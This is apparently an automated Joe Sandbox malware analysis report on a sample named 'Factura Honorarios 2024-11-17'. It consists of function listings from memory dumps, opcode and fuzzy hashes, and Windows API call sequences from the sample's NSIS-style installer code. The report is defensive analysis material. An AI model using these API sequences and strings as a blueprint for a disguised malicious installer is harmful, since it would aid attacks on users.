                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2936f4f652e141b22390e5eecd5b0386d1883bd065948b333d306834002e2404
                                                                                                                                  • Instruction ID: 602b3f2ee680032ef5f20f6b6eda5ce68c550349e282ac6886067681182c5339
                                                                                                                                  • Opcode Fuzzy Hash: 2936f4f652e141b22390e5eecd5b0386d1883bd065948b333d306834002e2404
                                                                                                                                  • Instruction Fuzzy Hash: 3C015E75E00209DFDB55AFB5DC486AE7BB5FB88310F004539F91AE7250DB3489118BB1
                                                                                                                                  Function 38F84640 Relevance: .0, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc07e1f71e5f94c6361325b4e715b2f1ad93417af0dda6ec1eb23913f5172e12
                                                                                                                                  • Instruction ID: eb9eb9f27a39cc53c5e1d8920b6701eff0890e479d5aab395390935ba7399726
                                                                                                                                  • Opcode Fuzzy Hash: bc07e1f71e5f94c6361325b4e715b2f1ad93417af0dda6ec1eb23913f5172e12
                                                                                                                                  • Instruction Fuzzy Hash: DF015AB5300A008FD704DB29D598A56BBE6BF99B61F108869E109CB761DB70ED00CB21
                                                                                                                                  Function 0015E8E8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fa7575b445791e16880fb3688480692fcaa83be1c4553a89b1c79a0b78c43f6d
                                                                                                                                  • Instruction ID: 3f781627a27f2224f81571bfa29ec7d67bf4a6a501e8ae5a57485cb3dcb9f0d7
                                                                                                                                  • Opcode Fuzzy Hash: fa7575b445791e16880fb3688480692fcaa83be1c4553a89b1c79a0b78c43f6d
                                                                                                                                  • Instruction Fuzzy Hash: B8111B75D0420AEFDB01CFA8C8549AEBBB1FB4A300F414465DA10A7350E7355A1ADF92
                                                                                                                                  Function 0015ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1101601f1505a8868de287298a0e8191a93f1eff579519a54fe0497b2b7c670d
                                                                                                                                  • Instruction ID: 18d0f4b165f8eb3479790da6eda56b606d57b61e345929fbf02b4806df3fd48c
                                                                                                                                  • Opcode Fuzzy Hash: 1101601f1505a8868de287298a0e8191a93f1eff579519a54fe0497b2b7c670d
                                                                                                                                  • Instruction Fuzzy Hash: 90F0FC31380210CB87155A2EE85462A76EEEFC8B52395417AEC19CF361EF21CC478381
                                                                                                                                  Function 00159D59 Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ecc7958e8b9c40c713c255a06cb6f5ffe847d4a72e020eb2f11a74d8d0e84abd
                                                                                                                                  • Instruction ID: 8119533eea7fdf848c9925c4d3efc0883e1f6a7ad7c718a0fab73c2454853f7c
                                                                                                                                  • Opcode Fuzzy Hash: ecc7958e8b9c40c713c255a06cb6f5ffe847d4a72e020eb2f11a74d8d0e84abd
                                                                                                                                  • Instruction Fuzzy Hash: AAF03135300215EFDB085AA59854A6BAA9BEBC8361B148429B94AC7351DF71CC4593E1
                                                                                                                                  Function 38F84C98 Relevance: .0, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2773e2064b82a0a528b706826932cd8464a87ec0b1c20f8d00a4354b14d5e463
                                                                                                                                  • Instruction ID: 84157ed8ed44b88b2973e1f8514e99a22945c1ec13cd8ff5c558f51bd96611f1
                                                                                                                                  • Opcode Fuzzy Hash: 2773e2064b82a0a528b706826932cd8464a87ec0b1c20f8d00a4354b14d5e463
                                                                                                                                  • Instruction Fuzzy Hash: 62F04636B086508FC70A8739A41495ABBBEDFC726070404EBE008CB361EA32CC02C7A5
                                                                                                                                  Function 38F844CF Relevance: .0, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 739f137f4942ab39f766ce0f1c8a0e52a71bbf8808a47d78d8e16ed908a22adf
                                                                                                                                  • Instruction ID: a807900a054e806cdc42540d969e123c70f7a7d51b1b6543d835dddaa1bd44e6
                                                                                                                                  • Opcode Fuzzy Hash: 739f137f4942ab39f766ce0f1c8a0e52a71bbf8808a47d78d8e16ed908a22adf
                                                                                                                                  • Instruction Fuzzy Hash: DAF02232A043089FDB50DFA9D84199FBFF6FF8834075041AEE80497211E7319912CBA2
                                                                                                                                  Function 3920EB58 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 295cfdb4188e9ee894c7d1c9d08bed4f3fa972284c983e2842e8c45978d0abc6
                                                                                                                                  • Instruction ID: 2d5005f3ef78bc49579544db60dd456a7395745e4bca3951b302aded612b1f30
                                                                                                                                  • Opcode Fuzzy Hash: 295cfdb4188e9ee894c7d1c9d08bed4f3fa972284c983e2842e8c45978d0abc6
                                                                                                                                  • Instruction Fuzzy Hash: 6601E470E0031ADBCF44EFB9C9116AEBBF5BF88241F4085AAD519E7250EB3999018F91
                                                                                                                                  Function 0015AF36 Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                  • Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
                                                                                                                                  • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                  • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                                                                  Function 3920E6A0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9c61f84ad8e4cc45ebcc365db03757658db89284ecd7101cf148c1dbd85ce70a
                                                                                                                                  • Instruction ID: b97b6347823dd5b9d346d07a6855d74519bc2e6ebd34111a7b2ac838a6e976c5
                                                                                                                                  • Opcode Fuzzy Hash: 9c61f84ad8e4cc45ebcc365db03757658db89284ecd7101cf148c1dbd85ce70a
                                                                                                                                  • Instruction Fuzzy Hash: 80F012353406148FD708AB2AE96492A37EAEFC4751B0540A9F509CB7A1DE70DC41CB90
                                                                                                                                  Function 38F84990 Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48cd6765b9ba6db4ed2a0040aec36ebf61d6d3447b4f558d43814614e2ad5fb1
                                                                                                                                  • Instruction ID: 79452a1c1de6655effa1e1cf286bb44ea15634472633d97c9da5ea83a13035dd
                                                                                                                                  • Opcode Fuzzy Hash: 48cd6765b9ba6db4ed2a0040aec36ebf61d6d3447b4f558d43814614e2ad5fb1
                                                                                                                                  • Instruction Fuzzy Hash: 5DF05E35301605DFD700DF5AD884D5ABBEAFF887247508169E60987330CB719D51CB90
                                                                                                                                  Function 00156739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: db35491cda03046404be204d507322598624716241c72051db36d2181584241e
                                                                                                                                  • Instruction ID: 977cc38f6d245737ca21b7ceae0438194b7128da752eef8d8469b04be3cadf8e
                                                                                                                                  • Opcode Fuzzy Hash: db35491cda03046404be204d507322598624716241c72051db36d2181584241e
                                                                                                                                  • Instruction Fuzzy Hash: 95E08C340483814FCB03A775A8944883F72AF82100B0442A5D5099F5BBDFB80A8A8B62
                                                                                                                                  Function 00159C41 Relevance: .0, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                                                                  • Instruction ID: e07f69eb9864daab4bc7e152dae6a04e1e42d7d8ab62cf44b6f8a855657936cc
                                                                                                                                  • Opcode Fuzzy Hash: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                                                                  • Instruction Fuzzy Hash: 60E0EC36A00108DFDF05CF59E844AEDB7B2EB98326F11C066EA198B214D7358A65DB91
                                                                                                                                  Function 001528B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2eed623602348f7b83eaea3914946316de57ddc317cb2d07d397b57bad8cf63e
                                                                                                                                  • Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
                                                                                                                                  • Opcode Fuzzy Hash: 2eed623602348f7b83eaea3914946316de57ddc317cb2d07d397b57bad8cf63e
                                                                                                                                  • Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1
                                                                                                                                  Function 001528AB Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11e91c17e9330ecad281759e5e54601e790e1b6ea555387d4bdbd92d22d5b1c4
                                                                                                                                  • Instruction ID: e0ec01bc4f54603f4d09c1944825a045ae51b3dc64ee9d5923493a94847d752a
                                                                                                                                  • Opcode Fuzzy Hash: 11e91c17e9330ecad281759e5e54601e790e1b6ea555387d4bdbd92d22d5b1c4
                                                                                                                                  • Instruction Fuzzy Hash: 7FD05B35D6022BC6CB11EBA1EC140EDB738AED5221B948617D535371B0EB71175DC6A0
                                                                                                                                  Function 00158EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                  • Instruction ID: 7664a699ddf78696b84bb1121c3968f2adab32b7b61b11eb126afe8992ed5369
                                                                                                                                  • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                  • Instruction Fuzzy Hash: 64C0803310C1246A9234104E7C40DA3774DC3C53B5A210137FD3CE7200DC425C8401F4
                                                                                                                                  Function 38F84A40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68272f3cecb8564699d251b1925398e5b1ca7d8b699d78099bb8cbb035665843
                                                                                                                                  • Instruction ID: 78b4a45a4638a3d23f5a3fbd52776398d673a5e2ec500a65188c00dfee9b374f
                                                                                                                                  • Opcode Fuzzy Hash: 68272f3cecb8564699d251b1925398e5b1ca7d8b699d78099bb8cbb035665843
                                                                                                                                  • Instruction Fuzzy Hash: 2DD0C7363041146B4B061A999808CAEBB5ED7C97717148027F90993300CE714D2297E5
                                                                                                                                  Function 0015AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8d28c75fb51f7622cb9fbeaf7c1276c45790401e54fad4d7cd54705cd53f5d9b
                                                                                                                                  • Instruction ID: 41d4e86803b38b6882854b2515145f8184e352f80d2eb5deac951cb252a064eb
                                                                                                                                  • Opcode Fuzzy Hash: 8d28c75fb51f7622cb9fbeaf7c1276c45790401e54fad4d7cd54705cd53f5d9b
                                                                                                                                  • Instruction Fuzzy Hash: 7BD0673AB000089FCB149F99EC809DDF776FB98221B148116E915A3260C7319965DB60
                                                                                                                                  Function 00156748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ea34f53eebb474cf1ac69157d9e88c385019cbe825be76ccfd6be03b0a9531d3
                                                                                                                                  • Instruction ID: ab0f1ef95a4285b824e11601402135ddcae3174cbfdf06f89161a61ecc6b4822
                                                                                                                                  • Opcode Fuzzy Hash: ea34f53eebb474cf1ac69157d9e88c385019cbe825be76ccfd6be03b0a9531d3
                                                                                                                                  • Instruction Fuzzy Hash: EBC012300443184FD641F769EC45555373BB7C0501B408610A6091B67FDFB42E964BD6

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00403359 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32 ref: 0040337C
                                                                                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                                                  • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                                                  • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                                                  • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                                                  • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                                                  • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                                                  • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                                                  • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                                                  • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                                                  • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                  • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3441113951-3195845224
                                                                                                                                  • Opcode ID: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                                  • Opcode Fuzzy Hash: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                                                                                  Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
